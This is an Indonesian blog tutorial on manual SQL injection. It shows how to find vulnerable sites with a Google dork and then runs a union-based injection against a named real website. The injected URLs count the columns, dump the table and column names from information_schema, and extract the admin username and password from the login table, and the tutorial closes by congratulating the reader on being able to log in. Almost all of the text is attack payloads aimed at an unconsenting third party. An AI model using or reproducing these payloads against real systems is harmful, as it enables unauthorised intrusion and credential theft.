Keamanan Jaringan - Cara manual SQL Injection
1. Cari website sebagai target untuk percobaan SQL Injection dengan mengetikan inurl : php?id pada google atau bisa mengunjungi http://s...
1. Cari website sebagai target untuk percobaan SQL Injection dengan mengetikan inurl : php?id pada google atau bisa mengunjungi http://sqli20162016.blogspot.co.id/# dimana di web tersebut terdapat kumpulan SQL Vulnerable Websites.
2. Misalnya target kita adalah http://staywellayurveda.com/treatment_read.php?id=24
4. Selanjutnya tambahkan tanda petik (‘) pada akhir
link tersebut à http://staywellayurveda.com/treatment_read.php?id=24’
5. Apabila muncul error atau warning seperti
dibawah, maka eksekusi bisa dilanjutkan.
http://staywellayurveda.com/treatment_read.php?id=24
order by 2--
http://staywellayurveda.com/treatment_read.php?id=24
order by 3-- dan seterusnya.
Catatan : hapus
tanda petik di url sebelumnya.
7. Terus tambah angka sampai error atau warning
kembali muncul. Seperti dibawah ini
8. Ternyata error atau warning kembali muncul
pada “order by 5--“. Maka jumlah tablenya adalah 4. Karena ketika sampai 5 web
kembali error atau warning.
9. Selanjutnya ketikan perinta seperti dibawah ini
http://staywellayurveda.com/treatment_read.php?id=-24
union select 1,2,3,4—
Maka akan muncul
angka ajaib seperti dibawah :
10. Langkah selanjutnya adalah meng-ekstrak apasaja
yang ada dalam angka 2. Dengan cara mengganti angka 2 menjadi group_concat(table_name) kemudian
sebelah table terkhir (angka 4) tambahkan +from+information_schema.tables+where+table_schema=database()—seperti
dibawah ini :
11. Maka angka 2 tadi akan ter-ekstrak menjadi
seperti dibawah ini :
Angka
2 tadi ter-ekstrak menjadi à
about, ayurveda_packages, ayurveda_spa, banner, blog, brochure, facility, gallery_cat_more,
gallery_image, login, package, resort,
tab, tariff, tariff1, treat_pac
12. Karena ada hasil login maka kita coba kembali meng-ekstrak login untuk mengetahui apa yang ada didalam login dengan cara :
group_concat(table_name)
ubah menjadi group_concat(column_name)
schema.tables ubah
menjadi schema.columns
table_schema ubah
menjadi table_name
database() ubah
menjadi 0x6c6f67696e
Catatan : 6c6f67696e didapat dari mengubah kata login menjadi hexadecimal dan didepannya ditambahkan 0x
Seperti dibawah :
http://staywellayurveda.com/treatment_read.php?id=-24 union select 1,group_concat(column_name),3,4+from+information_schema.columns+where+table_name=0x6c6f67696e—
13. Ternyata didalam login terdapat id,uname,pword. Sekarang coba kembali untuk meng-ekstrak uname dan pword admin dari website tersebut dengan cara :
group_concat(column_name) ubah
menjadi group_concat(uname,0x3a,pword)
from+information_schema(….) ubah
menjadi from+login ß sumber dari uname dan pword
Catatan : 0x3a merupakan pemisah antara uname dan pword
Seperti dibawah :
http://staywellayurveda.com/treatment_read.php?id=-24
union select 1,group_concat(uname,0x3a,pword),3,4+from+login--
14. Dari gambar diatas sudah jelas bahwa uname à admin, dan pword à asd. Selamat anda
sudah bisa login ke website tersebut
15. Selamat mencoba
Jika ada pertanyaan bisa tinggalkan komentar atau contact saya :
e-mail : rio.hizkia90@gmail.com
id-line : hizkiarioo